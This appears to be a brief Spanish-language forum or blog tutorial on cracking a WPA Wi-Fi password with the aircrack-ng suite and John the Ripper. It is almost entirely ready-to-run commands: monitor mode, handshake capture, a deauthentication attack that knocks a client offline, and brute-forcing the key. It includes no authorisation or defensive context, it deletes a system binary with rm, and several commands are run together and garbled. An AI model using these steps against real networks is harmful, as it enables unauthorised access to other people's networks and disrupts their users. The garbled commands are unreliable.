Crackear WPA con Aircrack+Jhon the ripper
Paso 1,poner la targeta en modo monitor:
airmon-ng start wlanX
Paso 2, observar la red:
airodump-ngairodump-ng -c $C -w clave --bssid XX:XX:XX:XX:XX:X
$c es el canal del AP que queremos observar) "Abrir otra ventana y dejar airodump trabajando"
Paso 3, deautentificar:
aireplay-ng -0 2 -e NOMBRE_AP -a XX:XX:XX:XX:XX:XX -c ZZ:ZZ:ZZ:ZZ:ZZ:ZZ wlan
X digitos de la mac de AP, Z digitos de la mac del cliente a deautentificar) "En la ventana de airodump-ng aparece que ha habido handshake"
Paso 4, crackear por fuerza bruta:
rm /usr/bin/johnalias john="/pentest/passwords/jtr/john"
john -incremental=All -stdout | aircrack-ng -w - -e NOMBRE_AP -a 2 *.cap
ay lo yevais el paso 4 escribirlo al pie de letra con sus comas y espacios y simbolos y os ira